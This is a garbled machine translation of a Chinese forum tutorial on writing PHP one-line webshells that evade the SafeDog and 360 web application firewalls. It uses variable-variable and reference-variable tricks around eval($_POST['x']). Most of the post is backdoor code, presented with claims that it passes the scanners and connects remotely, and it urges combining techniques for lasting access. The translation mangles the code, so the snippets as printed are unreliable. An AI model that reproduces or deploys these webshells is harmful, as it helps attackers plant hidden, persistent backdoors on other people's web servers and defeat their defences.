[WEB] to bypass the security dog and write a 360PHP sentence

00X01 Security Dog is really a headache, especially when uploading a sentence or writing a sentence, will be blocked by the security dog to hold the shell.
Of course, a safe dog is the simplest of a WAF, and it's easy to get a bypass.
00x02
For the safety of the dog and 360, I do not pose a lot, but very practical for the following two

1. #可变变量
2. #引用变量

20:03
# #可变变量 (kitchen knife may error)
< @eval ($_post[' x '])
Copy Code

Often used by people know that just the simplest sentence but any WAF with the rules
Let's start by adding the required functions.
<?php
$a = ' B ';
$b =$_post[' x '];
@eval ($a);
Copy Code

We're going to test if we get killed.

Can see that is successful over the safe dog we come to test under connection

And success can be connected
Code Analysis #
<?php
$a = ' B ';
$b =$_post[' x '];
@eval ($a);
?>
Copy Code

Let's look at the second line of code
$a = ' B ';
Copy Code

Anyone who knows about mutable variables should be able to read it, a $ A in the third line $ $a is B, so to speak $ A is replaced by B.
Keep looking at line three.
$b =$_post[' x '];
Copy Code

According to the first line, you know that $ $a is $b, $b used to receive post-submitted data

Last line Fourth
@eval ($a);
Copy Code
Executing $ $a is equivalent to executing a $ A or $b. Finally, we integrate into one sentence
<?php $a = ' B '; $b =$_post[' x ']; @eval ($a);? >
Copy Code

Summarize
Variable variable is more flexible for dogs.
But D shield is only suitable for safe dogs with 360 targeted higher

00x04
# #引用变量
< @eval ($_post[' x '])
Copy Code
Or the original sentence, I first write the code.
<?php
$a =$_post[' x '];
$b =& $a;
@eval ($b);
?>
Copy Code

We continue to test whether we are killed,

Can see, the same as the security dog, we continue to test whether you can connect

As you can see, it is connected and can be manipulated.
# #代码分析
<?php
$a =$_post[' x '];
$b =& $a;
@eval ($b);
?>
Copy Code

Let's look at the second line of code
$a =$_post[' x '];
Copy Code

$a used to receive post-submitted data
Keep looking at the third line of code

$b =& $a;
Copy Code

$b refers to a $ A memory address indirectly equivalent to $b receiving post-submitted data
The last fourth line of code:
@eval ($b);
Copy Code

Execute $b. Finally, let's integrate it into one sentence.
<?php $a =$_post[' x ']; $b =& $a; @eval ($b);? >
Copy Code

Summary (as with mutable variables)
Variable variable is more flexible for dogs.
But D shield is only suitable for safe dogs with 360 targeted higher

00x05
Big Summary
Understand its principle, blindly copy in the Security dog update can not be able to write independently
* Ingenious, a variety of ways to combine to write a variety of abnormal words, so as to achieve lasting effects
3# Many exchanges with people, communication is indispensable to learn the fundamental, sharing ideas combined with ideas, it can be called a Daniel. 4# Security Dog is just a very simple WAF, can not stop here, low-key development to seek the arrogant technology

00x06
Of course, I only list the part, there are many other ways, such as function substitution, keyword splitting, double variables and so on.
The first time to write an article, may not write very well, there are suggestions can be commented out, thank you very much.
3# future I will share the idea of WAF injection, please support us!

This article source: Http://bbs.ichunqiu.com/thread-9012-1-1.html?from=bky

[WEB] to bypass the security dog and write a 360PHP sentence